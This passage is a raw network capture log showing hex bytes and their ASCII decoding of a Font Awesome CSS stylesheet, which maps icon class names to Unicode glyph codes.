                                                                          2023-11-21 16:58:40 UTC169INData Raw: 39 22 3b 20 7d 0a 0a 2e 66 61 2d 67 6f 6f 67 6c 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 61 30 22 3b 20 7d 0a 0a 2e 66 61 2d 67 6f 6f 67 6c 65 2d 64 72 69 76 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 33 61 61 22 3b 20 7d 0a 0a 2e 66 61 2d 67 6f 6f 67 6c 65 2d 70 61 79 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 65 30 37 39 22 3b 20 7d 0a 0a 2e 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 61 79 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 33 61 62 22 3b 20 7d 0a 0a 2e 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 75 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 62 33 22 3b 20 7d 0a 0a 2e 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c
                                                                          Data Ascii: 9"; }.fa-google:before { content: "\f1a0"; }.fa-google-drive:before { content: "\f3aa"; }.fa-google-pay:before { content: "\e079"; }.fa-google-play:before { content: "\f3ab"; }.fa-google-plus:before { content: "\f2b3"; }.fa-google-pl
                                                                          2023-11-21 16:58:40 UTC170INData Raw: 38 30 30 30 0d 0a 2d 67 72 69 6e 2d 74 6f 6e 67 75 65 2d 73 71 75 69 6e 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 38 61 22 3b 20 7d 0a 0a 2e 66 61 2d 67 72 69 6e 2d 74 6f 6e 67 75 65 2d 77 69 6e 6b 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 38 62 22 3b 20 7d 0a 0a 2e 66 61 2d 67 72 69 6e 2d 77 69 6e 6b 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 38 63 22 3b 20 7d 0a 0a 2e 66 61 2d 67 72 69 70 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 38 64 22 3b 20 7d 0a 0a 2e 66 61 2d 67 72 69 70 2d 6c 69 6e 65 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 37 61 34 22 3b 20 7d 0a
                                                                          Data Ascii: 8000-grin-tongue-squint:before { content: "\f58a"; }.fa-grin-tongue-wink:before { content: "\f58b"; }.fa-grin-wink:before { content: "\f58c"; }.fa-grip-horizontal:before { content: "\f58d"; }.fa-grip-lines:before { content: "\f7a4"; }
                                                                          2023-11-21 16:58:40 UTC172INData Raw: 2e 66 61 2d 68 61 6e 64 2d 70 6f 69 6e 74 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 61 37 22 3b 20 7d 0a 0a 2e 66 61 2d 68 61 6e 64 2d 70 6f 69 6e 74 2d 6c 65 66 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 61 35 22 3b 20 7d 0a 0a 2e 66 61 2d 68 61 6e 64 2d 70 6f 69 6e 74 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 61 34 22 3b 20 7d 0a 0a 2e 66 61 2d 68 61 6e 64 2d 70 6f 69 6e 74 2d 75 70 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 61 36 22 3b 20 7d 0a 0a 2e 66 61 2d 68 61 6e 64 2d 70 6f 69 6e 74 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 35 61 22 3b 20 7d 0a
                                                                          Data Ascii: .fa-hand-point-down:before { content: "\f0a7"; }.fa-hand-point-left:before { content: "\f0a5"; }.fa-hand-point-right:before { content: "\f0a4"; }.fa-hand-point-up:before { content: "\f0a6"; }.fa-hand-pointer:before { content: "\f25a"; }
                                                                          2023-11-21 16:58:40 UTC173INData Raw: 2d 68 65 61 64 70 68 6f 6e 65 73 2d 61 6c 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 38 66 22 3b 20 7d 0a 0a 2e 66 61 2d 68 65 61 64 73 65 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 39 30 22 3b 20 7d 0a 0a 2e 66 61 2d 68 65 61 72 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 30 34 22 3b 20 7d 0a 0a 2e 66 61 2d 68 65 61 72 74 2d 62 72 6f 6b 65 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 37 61 39 22 3b 20 7d 0a 0a 2e 66 61 2d 68 65 61 72 74 62 65 61 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 31 65 22 3b 20 7d 0a 0a 2e 66 61 2d 68 65 6c 69 63 6f 70 74 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20
                                                                          Data Ascii: -headphones-alt:before { content: "\f58f"; }.fa-headset:before { content: "\f590"; }.fa-heart:before { content: "\f004"; }.fa-heart-broken:before { content: "\f7a9"; }.fa-heartbeat:before { content: "\f21e"; }.fa-helicopter:before {
                                                                          2023-11-21 16:58:40 UTC174INData Raw: 72 67 6c 61 73 73 2d 68 61 6c 66 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 35 32 22 3b 20 7d 0a 0a 2e 66 61 2d 68 6f 75 72 67 6c 61 73 73 2d 73 74 61 72 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 35 31 22 3b 20 7d 0a 0a 2e 66 61 2d 68 6f 75 73 65 2d 64 61 6d 61 67 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 36 66 31 22 3b 20 7d 0a 0a 2e 66 61 2d 68 6f 75 73 65 2d 75 73 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 65 30 36 35 22 3b 20 7d 0a 0a 2e 66 61 2d 68 6f 75 7a 7a 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 37 63 22 3b 20 7d 0a 0a 2e 66 61 2d 68 72 79 76 6e 69 61 3a 62 65 66 6f 72 65 20 7b 0a
                                                                          Data Ascii: rglass-half:before { content: "\f252"; }.fa-hourglass-start:before { content: "\f251"; }.fa-house-damage:before { content: "\f6f1"; }.fa-house-user:before { content: "\e065"; }.fa-houzz:before { content: "\f27c"; }.fa-hryvnia:before {
                                                                          2023-11-21 16:58:40 UTC176INData Raw: 65 6e 74 3a 20 22 5c 66 37 61 66 22 3b 20 7d 0a 0a 2e 66 61 2d 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 36 62 22 3b 20 7d 0a 0a 2e 66 61 2d 69 6e 76 69 73 69 6f 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 37 62 30 22 3b 20 7d 0a 0a 2e 66 61 2d 69 6f 78 68 6f 73 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 30 38 22 3b 20 7d 0a 0a 2e 66 61 2d 69 74 61 6c 69 63 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 33 33 22 3b 20 7d 0a 0a 2e 66 61 2d 69 74 63 68 2d 69 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 38 33 61 22 3b 20 7d 0a 0a 2e 66 61 2d 69 74 75 6e
                                                                          Data Ascii: ent: "\f7af"; }.fa-internet-explorer:before { content: "\f26b"; }.fa-invision:before { content: "\f7b0"; }.fa-ioxhost:before { content: "\f208"; }.fa-italic:before { content: "\f033"; }.fa-itch-io:before { content: "\f83a"; }.fa-itun
                                                                          2023-11-21 16:58:40 UTC177INData Raw: 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 39 38 22 3b 20 7d 0a 0a 2e 66 61 2d 6b 69 77 69 2d 62 69 72 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 33 35 22 3b 20 7d 0a 0a 2e 66 61 2d 6b 6f 72 76 75 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 32 66 22 3b 20 7d 0a 0a 2e 66 61 2d 6c 61 6e 64 6d 61 72 6b 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 36 36 66 22 3b 20 7d 0a 0a 2e 66 61 2d 6c 61 6e 67 75 61 67 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 61 62 22 3b 20 7d 0a 0a 2e 66 61 2d 6c 61 70 74 6f 70 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 30 39 22 3b 20 7d 0a 0a 2e 66 61 2d 6c
                                                                          Data Ascii: re { content: "\f598"; }.fa-kiwi-bird:before { content: "\f535"; }.fa-korvue:before { content: "\f42f"; }.fa-landmark:before { content: "\f66f"; }.fa-language:before { content: "\f1ab"; }.fa-laptop:before { content: "\f109"; }.fa-l
                                                                          2023-11-21 16:58:40 UTC178INData Raw: 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 65 31 22 3b 20 7d 0a 0a 2e 66 61 2d 6c 69 6e 6f 64 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 62 38 22 3b 20 7d 0a 0a 2e 66 61 2d 6c 69 6e 75 78 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 37 63 22 3b 20 7d 0a 0a 2e 66 61 2d 6c 69 72 61 2d 73 69 67 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 39 35 22 3b 20 7d 0a 0a 2e 66 61 2d 6c 69 73 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 33 61 22 3b 20 7d 0a 0a 2e 66 61 2d 6c 69 73 74 2d 61 6c 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 32 32 22 3b 20 7d 0a 0a 2e 66 61 2d 6c 69
                                                                          Data Ascii: before { content: "\f0e1"; }.fa-linode:before { content: "\f2b8"; }.fa-linux:before { content: "\f17c"; }.fa-lira-sign:before { content: "\f195"; }.fa-list:before { content: "\f03a"; }.fa-list-alt:before { content: "\f022"; }.fa-li
                                                                          2023-11-21 16:58:40 UTC180INData Raw: 20 7d 0a 0a 2e 66 61 2d 6d 61 70 2d 6d 61 72 6b 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 34 31 22 3b 20 7d 0a 0a 2e 66 61 2d 6d 61 70 2d 6d 61 72 6b 65 72 2d 61 6c 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 33 63 35 22 3b 20 7d 0a 0a 2e 66 61 2d 6d 61 70 2d 70 69 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 37 36 22 3b 20 7d 0a 0a 2e 66 61 2d 6d 61 70 2d 73 69 67 6e 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 37 37 22 3b 20 7d 0a 0a 2e 66 61 2d 6d 61 72 6b 64 6f 77 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 36 30 66 22 3b 20 7d 0a 0a 2e 66 61 2d 6d 61 72 6b 65 72 3a 62 65 66 6f 72 65 20
                                                                          Data Ascii: }.fa-map-marker:before { content: "\f041"; }.fa-map-marker-alt:before { content: "\f3c5"; }.fa-map-pin:before { content: "\f276"; }.fa-map-signs:before { content: "\f277"; }.fa-markdown:before { content: "\f60f"; }.fa-marker:before
                                                                          2023-11-21 16:58:40 UTC181INData Raw: 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 37 35 33 22 3b 20 7d 0a 0a 2e 66 61 2d 6d 69 63 72 6f 62 6c 6f 67 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 65 30 31 61 22 3b 20 7d 0a 0a 2e 66 61 2d 6d 69 63 72 6f 63 68 69 70 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 64 62 22 3b 20 7d 0a 0a 2e 66 61 2d 6d 69 63 72 6f 70 68 6f 6e 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 33 30 22 3b 20 7d 0a 0a 2e 66 61 2d 6d 69 63 72 6f 70 68 6f 6e 65 2d 61 6c 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 33 63 39 22 3b 20 7d 0a 0a 2e 66 61 2d 6d 69 63 72 6f 70 68 6f 6e 65 2d 61 6c 74 2d 73 6c 61 73 68 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74
                                                                          Data Ascii: content: "\f753"; }.fa-microblog:before { content: "\e01a"; }.fa-microchip:before { content: "\f2db"; }.fa-microphone:before { content: "\f130"; }.fa-microphone-alt:before { content: "\f3c9"; }.fa-microphone-alt-slash:before { content
                                                                          2023-11-21 16:58:40 UTC182INData Raw: 74 3a 20 22 5c 66 35 61 37 22 3b 20 7d 0a 0a 2e 66 61 2d 6d 6f 73 71 75 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 36 37 38 22 3b 20 7d 0a 0a 2e 66 61 2d 6d 6f 74 6f 72 63 79 63 6c 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 31 63 22 3b 20 7d 0a 0a 2e 66 61 2d 6d 6f 75 6e 74 61 69 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 36 66 63 22 3b 20 7d 0a 0a 2e 66 61 2d 6d 6f 75 73 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 38 63 63 22 3b 20 7d 0a 0a 2e 66 61 2d 6d 6f 75 73 65 2d 70 6f 69 6e 74 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 34 35 22 3b 20 7d 0a 0a 2e 66 61 2d 6d 75 67 2d 68 6f 74 3a 62
                                                                          Data Ascii: t: "\f5a7"; }.fa-mosque:before { content: "\f678"; }.fa-motorcycle:before { content: "\f21c"; }.fa-mountain:before { content: "\f6fc"; }.fa-mouse:before { content: "\f8cc"; }.fa-mouse-pointer:before { content: "\f245"; }.fa-mug-hot:b
                                                                          2023-11-21 16:58:40 UTC184INData Raw: 20 22 5c 66 31 39 62 22 3b 20 7d 0a 0a 2e 66 61 2d 6f 70 65 72 61 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 36 61 22 3b 20 7d 0a 0a 2e 66 61 2d 6f 70 74 69 6e 2d 6d 6f 6e 73 74 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 33 63 22 3b 20 7d 0a 0a 2e 66 61 2d 6f 72 63 69 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 38 64 32 22 3b 20 7d 0a 0a 2e 66 61 2d 6f 73 69 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 31 61 22 3b 20 7d 0a 0a 2e 66 61 2d 6f 74 74 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 37 30 30 22 3b 20 7d 0a 0a 2e 66 61 2d 6f 75 74 64 65 6e 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e
                                                                          Data Ascii: "\f19b"; }.fa-opera:before { content: "\f26a"; }.fa-optin-monster:before { content: "\f23c"; }.fa-orcid:before { content: "\f8d2"; }.fa-osi:before { content: "\f41a"; }.fa-otter:before { content: "\f700"; }.fa-outdent:before { con
                                                                          2023-11-21 16:58:40 UTC185INData Raw: 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 61 63 22 3b 20 7d 0a 0a 2e 66 61 2d 70 65 6e 2d 6e 69 62 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 61 64 22 3b 20 7d 0a 0a 2e 66 61 2d 70 65 6e 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 34 62 22 3b 20 7d 0a 0a 2e 66 61 2d 70 65 6e 63 69 6c 2d 61 6c 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 33 30 33 22 3b 20 7d 0a 0a 2e 66 61 2d 70 65 6e 63 69 6c 2d 72 75 6c 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 61 65 22 3b 20 7d 0a 0a 2e 66 61 2d 70 65 6e 6e 79 2d 61 72 63 61 64 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 37 30 34 22 3b
                                                                          Data Ascii: content: "\f5ac"; }.fa-pen-nib:before { content: "\f5ad"; }.fa-pen-square:before { content: "\f14b"; }.fa-pencil-alt:before { content: "\f303"; }.fa-pencil-ruler:before { content: "\f5ae"; }.fa-penny-arcade:before { content: "\f704";
                                                                          2023-11-21 16:58:40 UTC186INData Raw: 69 65 64 2d 70 69 70 65 72 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 65 30 31 65 22 3b 20 7d 0a 0a 2e 66 61 2d 70 69 67 67 79 2d 62 61 6e 6b 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 64 33 22 3b 20 7d 0a 0a 2e 66 61 2d 70 69 6c 6c 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 38 34 22 3b 20 7d 0a 0a 2e 66 61 2d 70 69 6e 74 65 72 65 73 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 64 32 22 3b 20 7d 0a 0a 2e 66 61 2d 70 69 6e 74 65 72 65 73 74 2d 70 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 33 31 22 3b 20 7d 0a 0a 2e 66 61 2d 70 69 6e 74 65 72 65 73 74 2d 73 71 75 61 72 65 3a 62 65
                                                                          Data Ascii: ied-piper-square:before { content: "\e01e"; }.fa-piggy-bank:before { content: "\f4d3"; }.fa-pills:before { content: "\f484"; }.fa-pinterest:before { content: "\f0d2"; }.fa-pinterest-p:before { content: "\f231"; }.fa-pinterest-square:be
                                                                          2023-11-21 16:58:40 UTC188INData Raw: 38 34 22 3b 20 7d 0a 0a 2e 66 61 2d 70 72 65 73 63 72 69 70 74 69 6f 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 62 31 22 3b 20 7d 0a 0a 2e 66 61 2d 70 72 65 73 63 72 69 70 74 69 6f 6e 2d 62 6f 74 74 6c 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 38 35 22 3b 20 7d 0a 0a 2e 66 61 2d 70 72 65 73 63 72 69 70 74 69 6f 6e 2d 62 6f 74 74 6c 65 2d 61 6c 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 38 36 22 3b 20 7d 0a 0a 2e 66 61 2d 70 72 69 6e 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 32 66 22 3b 20 7d 0a 0a 2e 66 61 2d 70 72 6f 63 65 64 75 72 65 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 38
                                                                          Data Ascii: 84"; }.fa-prescription:before { content: "\f5b1"; }.fa-prescription-bottle:before { content: "\f485"; }.fa-prescription-bottle-alt:before { content: "\f486"; }.fa-print:before { content: "\f02f"; }.fa-procedures:before { content: "\f48
                                                                          2023-11-21 16:58:40 UTC189INData Raw: 72 65 61 63 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 31 62 22 3b 20 7d 0a 0a 2e 66 61 2d 72 65 61 63 74 65 75 72 6f 70 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 37 35 64 22 3b 20 7d 0a 0a 2e 66 61 2d 72 65 61 64 6d 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 64 35 22 3b 20 7d 0a 0a 2e 66 61 2d 72 65 62 65 6c 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 64 30 22 3b 20 7d 0a 0a 2e 66 61 2d 72 65 63 65 69 70 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 34 33 22 3b 20 7d 0a 0a 2e 66 61 2d 72 65 63 6f 72 64 2d 76 69 6e 79 6c 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66
                                                                          Data Ascii: react:before { content: "\f41b"; }.fa-reacteurope:before { content: "\f75d"; }.fa-readme:before { content: "\f4d5"; }.fa-rebel:before { content: "\f1d0"; }.fa-receipt:before { content: "\f543"; }.fa-record-vinyl:before { content: "\f
                                                                          2023-11-21 16:58:40 UTC190INData Raw: 33 35 22 3b 20 7d 0a 0a 2e 66 61 2d 72 6f 63 6b 65 74 63 68 61 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 33 65 38 22 3b 20 7d 0a 0a 2e 66 61 2d 72 6f 63 6b 72 6d 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 33 65 39 22 3b 20 7d 0a 0a 2e 66 61 2d 72 6f 75 74 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 64 37 22 3b 20 7d 0a 0a 2e 66 61 2d 72 73 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 39 65 22 3b 20 7d 0a 0a 2e 66 61 2d 72 73 73 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 34 33 22 3b 20 7d 0a 0a 2e 66 61 2d 72 75 62 6c 65 2d 73 69 67 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63
                                                                          Data Ascii: 35"; }.fa-rocketchat:before { content: "\f3e8"; }.fa-rockrms:before { content: "\f3e9"; }.fa-route:before { content: "\f4d7"; }.fa-rss:before { content: "\f09e"; }.fa-rss-square:before { content: "\f143"; }.fa-ruble-sign:before { c
                                                                          2023-11-21 16:58:40 UTC192INData Raw: 0a 0a 2e 66 61 2d 73 65 61 72 63 68 2d 6d 69 6e 75 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 31 30 22 3b 20 7d 0a 0a 2e 66 61 2d 73 65 61 72 63 68 2d 70 6c 75 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 30 65 22 3b 20 7d 0a 0a 2e 66 61 2d 73 65 61 72 63 68 65 6e 67 69 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 33 65 62 22 3b 20 7d 0a 0a 2e 66 61 2d 73 65 65 64 6c 69 6e 67 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 34 64 38 22 3b 20 7d 0a 0a 2e 66 61 2d 73 65 6c 6c 63 61 73 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 64 61 22 3b 20 7d 0a 0a 2e 66 61 2d 73 65 6c 6c 73 79 3a 62 65 66 6f 72 65 20
                                                                          Data Ascii: .fa-search-minus:before { content: "\f010"; }.fa-search-plus:before { content: "\f00e"; }.fa-searchengin:before { content: "\f3eb"; }.fa-seedling:before { content: "\f4d8"; }.fa-sellcast:before { content: "\f2da"; }.fa-sellsy:before
                                                                          2023-11-21 16:58:40 UTC193INData Raw: 67 75 61 67 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 61 37 22 3b 20 7d 0a 0a 2e 66 61 2d 73 69 67 6e 2d 6f 75 74 2d 61 6c 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 66 35 22 3b 20 7d 0a 0a 2e 66 61 2d 73 69 67 6e 61 6c 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 31 32 22 3b 20 7d 0a 0a 2e 66 61 2d 73 69 67 6e 61 74 75 72 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 35 62 37 22 3b 20 7d 0a 0a 2e 66 61 2d 73 69 6d 2d 63 61 72 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 37 63 34 22 3b 20 7d 0a 0a 2e 66 61 2d 73 69 6d 70 6c 79 62 75 69 6c 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74
                                                                          Data Ascii: guage:before { content: "\f2a7"; }.fa-sign-out-alt:before { content: "\f2f5"; }.fa-signal:before { content: "\f012"; }.fa-signature:before { content: "\f5b7"; }.fa-sim-card:before { content: "\f7c4"; }.fa-simplybuilt:before { content
